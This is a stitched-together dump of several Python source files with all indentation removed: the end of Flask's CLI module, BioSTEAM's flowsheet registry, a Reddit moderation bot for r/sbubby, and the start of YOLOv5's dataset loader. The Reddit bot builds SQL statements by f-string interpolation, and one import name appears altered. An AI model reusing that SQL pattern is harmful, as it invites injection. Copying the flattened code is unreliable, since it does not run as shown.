for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path, encoding="utf-8")
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = f" * Serving Flask app {app_import_path!r}"
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(f" * Environment: {env}")
if env == "production":
click.secho(
" WARNING: This is a development server. Do not use it in"
" a production deployment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(f" * Debug mode: {'on' if debug else 'off'}")
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
if ssl is None:
raise click.BadParameter(
'Using "--cert" requires Python to be compiled with SSL support.',
ctx,
param,
)
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import cryptography # noqa: F401
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires the cryptography library.",
ctx,
param,
)
return value
obj = import_string(value, silent=True)
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
is_context = ssl and isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
class SeparatedPathType(click.Path):
"""Click option type that accepts a list of values separated by the
OS's path separator (``:`` on POSIX, ``;`` on Windows). Each value is
validated as a :class:`click.Path` type.
"""
def convert(self, value, param, ctx):
items = self.split_envvar_value(value)
super_convert = super().convert
return [super_convert(item, param, ctx) for item in items]
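# Rough illustration of the splitting behaviour; ``click.Path`` sets
# ``envvar_list_splitter`` to ``os.path.pathsep``, and the file names below
# are hypothetical:
#
#     SeparatedPathType().split_envvar_value("config.py:data/schema.sql")
#     # -> ["config.py", "data/schema.sql"]   (on a POSIX system)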
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loading",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
f" are separated by {os.path.pathsep!r}."
),
)
@pass_script_info
def run_command(
info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command() -> None:
"""Run an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to its configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from .globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = (
f"Python {sys.version} on {sys.platform}\n"
f"App: {app.import_name} [{app.env}]\n"
f"Instance: {app.instance_path}"
)
ctx: dict = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup) as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
# Site, customize, or startup script can set a hook to call when
# entering interactive mode. The default one sets up readline with
# tab and history completion.
interactive_hook = getattr(sys, "__interactivehook__", None)
if interactive_hook is not None:
try:
import readline
from rlcompleter import Completer
except ImportError:
pass
else:
# rlcompleter uses __main__.__dict__ by default, which is
# flask.__main__. Use the shell context instead.
readline.set_completer(Completer(ctx).complete)
interactive_hook()
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort: str, all_methods: bool) -> None:
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods)) # type: ignore
rule_methods = [
", ".join(sorted(rule.methods - ignored_methods)) # type: ignore
for rule in rules
]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main() -> None:
if int(click.__version__[0]) < 8:
warnings.warn(
"Using the `flask` cli with Click 7 is deprecated and"
" will not be supported starting with Flask 2.1."
" Please upgrade to Click 8 as soon as possible.",
DeprecationWarning,
)
# TODO omit sys.argv once https://github.com/pallets/click/issues/536 is fixed
cli.main(args=sys.argv[1:])
if __name__ == "__main__":
main()
|
_flowsheet.py
|
# -*- coding: utf-8 -*-
"""
As BioSTEAM objects are created, they are automatically registered. The `find` object allows the user to find any Unit, Stream or System instance. When `find` is called, it simply looks up the item and returns it.
"""
from graphviz import Digraph
from IPython import display
from .utils import Register, search_register
__all__ = ('find', 'Flowsheet')
def make_digraph(units, streams, **graph_attrs):
"""Return digraph of units and streams."""
# Create a digraph and set direction left to right
f = Digraph(format='svg')
f.attr(rankdir='LR', **graph_attrs)
# Set up unit nodes
UD = {} # Full description (ID and line) keyed by Unit object
for u in units:
if hasattr(u, 'link_streams'): u.link_streams()
graphics = u._graphics
if not graphics.in_system:
continue # Ignore Unit
# Initialize graphics and make Unit node with attributes
Type = graphics.node_function(u) or u.line
name = u.ID + '\n' + Type
f.attr('node', **u._graphics.node)
f.node(name)
UD[u] = name
keys = UD.keys()
# Set attributes for graph and streams
f.attr('node', shape='rarrow', fillcolor='#79dae8',
style='filled', orientation='0', width='0.6',
height='0.6', color='black', peripheries='1')
f.attr('graph', splines='normal', overlap='orthoyx',
outputorder='edgesfirst', nodesep='0.15', maxiter='1000000')
f.attr('edge', dir='forward')
for s in streams:
if not s: continue # Ignore stream
oU = s._source
if oU:
oi = oU._outs.index(s)
dU = s._sink
if dU:
di = dU._ins.index(s)
# Make stream nodes / unit-stream edges / unit-unit edges
if oU not in keys and dU not in keys: pass
# Stream is not attached to anything
elif oU not in keys:
# Feed stream case
f.node(s.ID)
edge_in = dU._graphics.edge_in
f.attr('edge', arrowtail='none', arrowhead='none',
tailport='e', **edge_in[di])
f.edge(s.ID, UD[dU])
elif dU not in keys:
# Product stream case
f.node(s.ID)
edge_out = oU._graphics.edge_out
f.attr('edge', arrowtail='none', arrowhead='none',
headport='w', **edge_out[oi])
f.edge(UD[oU], s.ID)
else:
# Process stream case
edge_in = dU._graphics.edge_in
edge_out = oU._graphics.edge_out
f.attr('edge', arrowtail='none', arrowhead='normal',
**edge_in[di], **edge_out[oi])
f.edge(UD[oU], UD[dU], label=s.ID)
return f
def save_digraph(digraph, file, format):
if not file:
if format == 'svg':
x = display.SVG(digraph.pipe(format=format))
else:
x = display.Image(digraph.pipe(format='png'))
display.display(x)
else:
if '.' not in file:
file += '.' + format
img = digraph.pipe(format=format)
f = open(file, 'wb')
f.write(img)
f.close()
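# A small sketch of how the two helpers above are typically combined
# (``units`` and ``streams`` would come from a Flowsheet's registers; the
# graph attribute shown is just an example of a graphviz keyword):
#
#     digraph = make_digraph(units, streams, size='10,10')
#     save_digraph(digraph, None, 'svg')          # display inline in IPython
#     save_digraph(digraph, 'flowsheet', 'png')   # write flowsheet.png to disk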
# %% Flowsheet search
class Flowsheets:
__getattribute__ = __getitem__ = object.__getattribute__
def __setattr__(self, key, value):
raise TypeError(f"'{type(self).__name__}' object does not support attribute assignment")
__setitem__ = __setattr__
def __iter__(self):
yield from self.__dict__.values()
def __delattr__(self, key):
if key == find.ID:
raise AttributeError('cannot delete main flowsheet')
else:
super().__delattr__(key)
def __repr__(self):
return f'Register:\n ' + '\n '.join([repr(i) for i in self])
class Flowsheet:
"""Create a Flowsheet object which stores references to all stream, unit, and system objects."""
#: [Register] All flowsheets.
flowsheet = Flowsheets()
def __init__(self, ID):
#: [Register] Contains all System objects as attributes.
self.system = Register()
#: [Register] Contains all Unit objects as attributes.
self.unit = Register()
#: [Register] Contains all Stream objects as attributes.
self.stream = Register()
#: [str] ID of flowsheet.
self._ID = ID
self.flowsheet.__dict__[ID] = self
def __setattr__(self, key, value):
if hasattr(self, '_ID'):
raise TypeError(f"'{type(self).__name__}' object does not support attribute assignment")
else:
super().__setattr__(key, value)
@property
def ID(self):
return self._ID
def diagram(self, kind='surface', file=None, format='svg', **graph_attrs):
"""Display all units and attached streams.
Parameters
----------
kind='surface' : Must be one of the following
* **'thorough':** Thoroughly display every unit.
* **'surface':** Display units and recycle systems.
* **'minimal':** Minimally display flowsheet as a box with feeds and products.
"""
if kind == 'thorough':
return self._thorough_diagram(file, format, **graph_attrs)
elif kind == 'surface':
return self._surface_diagram(file, format, **graph_attrs)
elif kind == 'minimal':
return self._minimal_diagram(file, format, **graph_attrs)
else:
raise ValueError(f"kind must be either 'thorough', 'surface', or 'minimal'.")
def _thorough_diagram(self, file, format, **graph_attrs):
units = list(self.unit)
units.reverse()
streams = set()
for u in units:
streams.update(u._ins)
streams.update(u._outs)
f = make_digraph(units, streams, **graph_attrs)
save_digraph(f, file, format)
def _minimal_diagram(self, file, format, **graph_attrs):
from . import _system, Stream
streams = list(self.stream)
feeds = set(filter(_system._isfeed, streams))
products = set(filter(_system._isproduct, streams))
product = Stream(None)
product._ID = ''
feed = Stream(None)
feed._ID = ''
_system._streamUnit('\n'.join([i.ID for i in feeds]),
None, feed)
_system._streamUnit('\n'.join([i.ID for i in products]),
product, None)
unit = _system._systemUnit(self.ID, feed, product)
unit.line = 'flowsheet'
unit.diagram(1, file, format, **graph_attrs)
def _surface_diagram(self, file, format, **graph_attrs):
from . import _system, Stream
units = set(self.unit)
StrUnit = _system._streamUnit
refresh_units = set()
for i in self.system:
if i.recycle and not any(sub.recycle for sub in i.subsystems):
outs = []
ins = []
feeds = []
products = []
for s in i.streams:
source = s._source
sink = s._sink
if source in i.units and sink not in i.units:
if sink: outs.append(s)
else: products.append(s)
refresh_units.add(source)
elif sink in i.units and source not in i.units:
if source: ins.append(s)
else: feeds.append(s)
refresh_units.add(sink)
if len(feeds) > 1:
feed = Stream(None)
feed._ID = ''
units.add(StrUnit('\n'.join([i.ID for i in feeds]),
None, feed))
ins.append(feed)
else: ins += feeds
if len(products) > 1:
product = Stream(None)
product._ID = ''
units.add(StrUnit('\n'.join([i.ID for i in products]),
product, None))
outs.append(product)
else: outs += products
subsystem_unit = _system._systemUnit(i.ID, ins, outs)
units.difference_update(i.units)
units.add(subsystem_unit)
sys = _system.System(None, units)
sys._thorough_diagram(file, format, **graph_attrs)
for i in refresh_units:
i._ins[:] = i._ins
i._outs[:] = i._outs
def __call__(self, ID):
"""Return requested biosteam item.
Parameters
----------
ID : str
ID of the requested item.
"""
ID = ID.replace(' ', '_')
obj = (search_register(self.stream, ID)
or search_register(self.unit, ID)
or search_register(self.system, ID))
if not obj: raise LookupError(f"no registered item '{ID}'")
return obj
def __str__(self):
return self.ID
def __repr__(self):
return f'<{type(self).__name__}: {self.ID}>'
class MainFlowsheet(Flowsheet):
"""Create a MainFlowsheet object which automatically registers biosteam objects as they are created."""
__slots__ = ()
@staticmethod
def set_flowsheet(flowsheet):
"""Set main flowsheet that is updated with new biosteam objects."""
if isinstance(flowsheet, Flowsheet):
object.__setattr__(find, '__dict__', flowsheet.__dict__)
else:
raise TypeError('flowsheet must be a Flowsheet object')
__setattr__ = Flowsheets.__setattr__
def __new__(cls):
raise TypeError('cannot create new find object.')
def __repr__(self):
return f'<{type(self).__name__}: {self.ID}>'
#: [find] Find BioSTEAM objects by ID.
find = object.__new__(MainFlowsheet)
find.set_flowsheet(Flowsheet('default'))
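# A small usage sketch, assuming a unit registered under the ID 'R1' and a
# stream registered under 'feed' (both hypothetical):
#
#     find('R1')               # look up the Unit, Stream, or System named R1
#     find.stream.feed         # attribute access through the stream register
#     find.diagram('surface')  # draw units and recycle systems of the flowsheet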
# %% Attempt at constantly rendered digraph
# #: [bool] True if flowsheet is constantly rendered
# self.live = True
# def _show_once(self):
# fig = plt.figure()
# plt.axis('off')
# f = open('diagram.png', 'wb')
# diagram = make_digraph(self.unit.values()).pipe(format='png')
# f.write(diagram)
# img = mpimg.imread('diagram.png')
# plt.imshow(img, interpolation='spline36')
# fig.show()
# # img = Image.open('diagram.png')
# # img.show()
# def _show(self):
# fig = plt.figure()
# plt.axis('off')
# f = open('diagram.png', 'wb')
# for i in range(3):
# diagram = make_digraph(self.unit.values()).pipe(format='png')
# f.write(diagram)
# img = mpimg.imread('diagram.png')
# plt.clf()
# plt.imshow(img, interpolation='spline36')
# fig.show()
# time.sleep(10)
# f.close()
# os.remove('diagram.png')
# def show(self):
# t1 = threading.Thread(target=self._show())
# t1.start()
|
main.py
|
# Sheen Patel
# u/SbubbyBot for the mods of r/Sbubby
import threading # to be able to run in threads
import praw # all the reddit i/o
import os # to get environment variables containing secrets
import psycopg2 # used for postgresql database stuff
from datetime import timedelta # timedeltas for comparison
import arrow # better datetime
import time # for time.sleep
from dotenv import load_dotenv # need this to import env. vars
from sys import exit # to exit gracefully from Ctrl+c
from signal import signal, SIGINT # to exit gracefully from Ctrl+C
import re # regex for the modmail
from digiformatter import styles #VT-100 formatting for console text
import logging #logging
from digiformatter import logger as digilogger #better logging
import importlib.resources as pkg_resources # read files in reliably
import data # load resources from ./data
# Set up logging
logging.basicConfig(level=logging.INFO)
dfhandler = digilogger.DigiFormatterHandler()
logger = logging.getLogger("sbubbybot")
logger.handlers = []
logger.propagate = False
logger.addHandler(dfhandler)
styles.create("angry", fg="dark_orange", attr="bold", prefix="ANGY", showtime=True, showprefix=True)
# load env variables (only for local testing, Heroku takes care of it otherwise)
load_dotenv()
# Setting this var to true will allow the bot to actually comment on the post and not dry-run.
PRODUCTION = False
# create the reddit instance for the bot to use
reddit = praw.Reddit(
user_agent='SbubbyBot v. 1.0 by u/CrazedPatel',
client_id=os.environ['client_id'],
client_secret=os.environ['client_secret'],
username=os.environ['reddit_username'],
password=os.environ['reddit_password'])
# mark the subreddit
sbubby = reddit.subreddit('sbubby')
# MAGIC_EYE_BOT's profile
# magicEye = reddit.redditor('MAGIC_EYE_BOT')
database = ""
# connect to the postgresql database
try:
database = psycopg2.connect(user="postgres", password=os.environ['database_password'],
database=os.environ["database_name"], host=os.environ["DATABASE_URL"], port="5432")
except Exception as err:
logger.error(err)
logger.warn("Error connecting normal way, try other way")
database = psycopg2.connect(os.environ['DATABASE_URL'], sslmode='require')
cur = database.cursor()
# Load the sunday message from file. (this only happens once so it's minimal impact on performance.)
sunday_message = pkg_resources.read_text(data, "sunday_message.txt")
def main():
# if True: # use this if for testing small things.
# for i in reddit.subreddit('finnkennedy').modmail.conversations(limit=20):
# print(i.subject)
# print("\t", i.obj_ids)
# return
logger.info("creating threads")
oneMinTimerThread = threading.Thread(target=oneMinTimerThreadFunc)
repostAndFlairThread = threading.Thread(target=repostAndFlairThreadFunc)
logger.info("starting threads")
oneMinTimerThread.start()
repostAndFlairThread.start()
logger.info("threads started")
def repostAndFlairThreadFunc():
logger.info("repost and flair thread started")
for submission in sbubby.stream.submissions():
# skip post if author is moderator
moderators = sbubby.moderator()
if submission.author in moderators:
continue
# only do the stuff if the post hasn't been clicked
if submission.clicked is False:
doFlair(submission)
commonRepost(submission)
# need to commit each time because of the other thread and the endless for loop
database.commit()
def oneMinTimerThreadFunc():
logger.info("one Min Timer thread started")
while True:
# start timer
start = arrow.now()
# check for any flair stuff that needs to be checked up on
checkFlairDB()
howMuchKarmaModmail()
# attempt to do Sunday Sbubday; making sure there are no duplicates is handled in the function
attemptSundaySbubday()
# end timer
end = arrow.now()
desired_restart_time = start.shift(minutes=1)
time_remaining = desired_restart_time - end
time.sleep(max(0, time_remaining.total_seconds())) # sleep until its been one minute since start
def sundaySbubby():
logger.info("It is sunday. Sunday Sbubby started...")
# Get and remove the flair templates:
for flairTemp in sbubby.flair.templates:
print(flairTemp)
if flairTemp == "Eaten Fresh" or flairTemp == "IRL" or flairTemp == "Logoswap":
# found flair to remove -- now removing it!
if PRODUCTION: # only actually remove if production is on
sbubby.flair.templates.update(flairTemp["id"], mod_only=True)
# get the automod post.
# sort subreddit by new for author:AutoModerator
link = None
message = None
linkMessage = "Please see the comments for the post to request new Sbubbies."
for submission in sbubby.search("author:AutoModerator", sort="new", time_filter="day"):
# only want to use the first one because it is the most recent
link = submission
linkMessage = f"[Go to the latest request thread here to request a sbubby]({link.url})"
break
if link is None:
# we weren't able to find a link, so fail angrily!!!
styles.print("Could not find the Automoderator link! will use placeholder!", style = "angry")
message = sunday_message.format(linkMessage)
# with the message, now post it and sticky it. Unsticky the automod post
if PRODUCTION:
if link is not None:
if link.stickied:
link.mod.sticky(state=False)
submission = sbubby.submit("Sunday Sbubday is today!", selftext=message)
submission.mod.distinguish(how='yes', sticky=True) # stickies to the top
def unSundaySbubby():
# add flairs eaten Fresh, Logoswap, IRL,
# unsticky announcement post,
# resticky requests post
if PRODUCTION:
for flairTemp in sbubby.flair.templates:
if flairTemp == "Eaten Fresh" or flairTemp == "IRL" or flairTemp == "Logoswap":
# found flair to remove -- now removing it!
if PRODUCTION: # only actually remove if production is on
sbubby.flair.templates.update(flairTemp["id"], mod_only=False)
# unsticky my post by searching through all the stickied posts to find the one authored by me
for i in range(1, 5):
try:
stickied = sbubby.sticky(number=i)
if stickied.author == reddit.user.me():
stickied.mod.sticky(state=False)
except Exception as err:
logger.error(err)
break
# sticky most recent automod post.
for submission in sbubby.search("author:AutoModerator", sort="new", time_filter="week"):
submission.mod.sticky(state=True, bottom=False)
break
def attemptSundaySbubday():
logger.info("<Sunday Sbubday> Attempting to do a sunday sbubday activity!")
today = arrow.today("America/New_York").weekday()
# check whether there is a post. stickyNum = 0 means no post
stickyNum = 0
for i in range(1, 3):
try:
post = sbubby.sticky(number=i)
if "Sunday Sbubday" in post.title:
stickyNum = i
break # there is a post, no need to do anything.
except Exception as err:
logger.error(err)
logger.warn("no sticky at index ", i)
break # no more sticky posts, need to add post
logger.info(today)
if today == 6:
# sunday, check if already post, if not, post
logger.info("it is sunday")
if stickyNum == 0:
sundaySbubby()
elif today == 0:
# monday
logger.info("it is monday")
if stickyNum != 0:
unSundaySbubby()
def checkFlairDB():
logger.info("<Database> checking flair db")
cur.execute("select * from flairs;")
rows = cur.fetchall()
# row[0] = submission id, row[1] = time post created, row[2] = comment telling to flair id.
for row in rows:
epochTime = arrow.get(row[1])
now = arrow.now()
submission = reddit.submission(row[0]) # lazy instance of the thing
# check if the post should be removed, otherwise, do nothing
link_flair_text = 0
try:
link_flair_text = submission.link_flair_text
except Exception as err:
logger.error(err)
logger.warn("error could not get")
if now - epochTime > timedelta(minutes=10) and link_flair_text is None:
# remove the post.
logger.info("<Database> Post ", submission.id, " is past the time and has no flair.")
logger.info("<Database> Time's up! Remove post.")
# remove from database
cur.execute(f"DELETE from flairs where submission_id='{row[0]}';")
# do the comment thing
try:
if PRODUCTION:
comment_id = row[2]
if comment_id is None:
# need to find the real one
submission.comments.replace_more(limit=None)
for comment in submission.comments:
if comment.author == reddit.user.me():
comment_id = comment.id
logger.info("no comment found by me")
continue # continues with the next submission in db
reddit.comment(comment_id).delete()
if sbubby.user_is_moderator:
# remove post
submission.mod.remove(mod_note="Removed for lack of flair by sbubbybot")
submission.mod.send_removal_message("Hi! Your post was removed because it had no flair after 10 minutes of you being notified to flair your post. This message was sent automatically; if you think it's an error, send a modmail")
submission.unsave()
except Exception as err:
logger.error(err)
logger.warn("<Database> Could not do: post could have been deleted?? postid=", row[0])
elif submission.link_flair_text is not None:
# a flair was added, so the reminder is no longer needed.
logger.info(f"<Database> {submission.id} already has flair, removing from db.")
cur.execute(f"DELETE from flairs where submission_id='{row[0]}';")
if PRODUCTION:
# remove the comment as the flair is set
comment_id = row[2]
if comment_id is None:
# need to find the real one
submission.comments.replace_more(limit=None)
for comment in submission.comments:
if comment.author == reddit.user.me():
comment_id = comment.id
logger.info("no comment found by me")
continue # continues with the next submission in db
reddit.comment(comment_id).delete()
database.commit() # once all the queries are set, commit them all at once.
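# Note: the DELETE/INSERT statements in checkFlairDB and doFlair interpolate
# values with f-strings. A hedged sketch of the equivalent psycopg2
# parameter-bound form (same table and columns, behaviour otherwise unchanged):
#
#     cur.execute("DELETE FROM flairs WHERE submission_id = %s;", (row[0],))
#     cur.execute(
#         "INSERT INTO flairs (submission_id, time_created, comment_id)"
#         " VALUES (%s, to_timestamp(%s), %s) ON CONFLICT (submission_id) DO NOTHING",
#         (submission.id, submission.created_utc, comment_id),
#     )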
def doFlair(submission):
# check to see if flair first
logger.info("<Flair> Checking ", submission.id)
if submission.link_flair_text is None and submission.saved is False:
# check to see if post already been messaged
hasBeenMessaged = False
for comment in submission.comments:
if comment.author == reddit.user.me(): # if i have a top level comment then don't message
hasBeenMessaged = True
if not hasBeenMessaged:
submission.save()
logger.info(f"<Flair> message {submission.name} post to remind to flair!")
logger.info("<Flair> created on: ", submission.created_utc)
comment_id = None # only used if PRODUCTION is true, will still insert into db as None
if PRODUCTION:
# make a comment on this post.
comment = submission.reply("""# It seems you didn't flair your post!
Please flair your post now or it might get taken down!
This comment was made by a bot (contact me @ u/CrazedPatel)""")
if comment is not None:
comment_id = comment.id
cur.execute(f"INSERT INTO FLAIRS (submission_id, time_created, comment_id) VALUES ('{submission.id}', to_timestamp({submission.created_utc}), '{comment_id}') ON CONFLICT (submission_id) DO NOTHING")
else:
logger.info("<Flair> No need for flair message -- one already exists?")
def howMuchKarmaModmail():
logger.info("<Karma> Anti-\"how much karma\" bot started...")
for conversation in sbubby.modmail.conversations(limit=20):
# for each mail, check for specific keywords: "How much Karma" "Karma requirement" "Karma minimum"
# checks if the bot has already replied
hasBotReply = False
for message in conversation.messages:
print(message.body_markdown)
if not hasBotReply:
hasBotReply = message.author == 'BingerKurgBot'
if hasBotReply:
break
# will only reply if it hasn't already
if not hasBotReply:
firstMessage = conversation.messages[0]
messageBody = firstMessage.body_markdown
regex = r"karma.*minimum|minimum.*karma|How much.*karma|karma.*requirement|required.*karma"
regexmatch = re.search(regex, messageBody, flags=re.I)
if regexmatch:
# there is at least one occurrence, so send the canned reply
if PRODUCTION:
logger.info("How much karma modmail detected, sending reply to " + str(conversation))
conversation.reply("""Thank you for your message, but it seems that this message is asking about the Karma requirement to post on r/sbubby. The Karma minimum is to help prevent spam and is undisclosed to prevent trolls and spammers. **If your message is not about the required amount of karma but is for an approval request or another topic, don't worry, a human moderator will respond shortly.** However, you can go through our manual exemption process instead to post content as long as you make original sbubbies. The process is as follows:
1. Message us with a link to your removed post. **Don't delete your post, we won't be able to review or approve it if you delete it.**
1. A moderator will review your submission and ask questions if needed. If it can't be approved, we will explain how to make it acceptable for approval.
1. If the submission is accepted, you will receive a reply telling you your submission was approved. If you've completed the process 3 times successfully, you will receive an alert telling you that you are an approved user.
**Please note that you can only go through this process if you only post original sbubbies.**
Thanks :) This message was sent by the u/sbubbybot and is not perfect. We are working on improving it!""")
def commonRepost(submission):
logger.info("<Repost> Common reposts bot started...")
# TODO: Check each item in the imgur album -- if any is over the threshold:
# make a comment with the similarity amount, and then give link that it is similar to.
# mark post as spam(, and if user replies, then send modmail?)
def sigintHandler(signal, frame):
logger.warn(f"Received (most likely) Ctrl+C, exiting.")
database.close()
exit(0)
if __name__ == "__main__":
signal(SIGINT, sigintHandler)
main()
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from fuckutils.general import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
local_rank=-1, world_size=1):
# Make sure only the first process in DDP processes the dataset first, so the following ones can use the cache.
with torch_distributed_zero_first(local_rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, 8]) # number of workers
train_sampler = torch.utils.data.distributed.DistributedSampler(dataset) if local_rank != -1 else None
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=train_sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
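# Rough usage sketch; the ``opt`` namespace and the hyperparameter dict are
# assumptions (in the real training script they come from argparse and a YAML
# file), and 'data/train' is a placeholder path:
#
#     from argparse import Namespace
#     opt = Namespace(single_cls=False)
#     hyp = {'degrees': 0.0, 'translate': 0.1, 'scale': 0.5, 'shear': 0.0,
#            'perspective': 0.0, 'mixup': 0.0, 'hsv_h': 0.015, 'hsv_s': 0.7,
#            'hsv_v': 0.4, 'flipud': 0.0, 'fliplr': 0.5}
#     dataloader, dataset = create_dataloader('data/train', 640, 16, 32, opt,
#                                             hyp=hyp, augment=True)
#     for imgs, targets, paths, shapes in dataloader:
#         pass  # imgs: (batch, 3, H, W) uint8 tensor; targets: (n, 6) boxes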
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
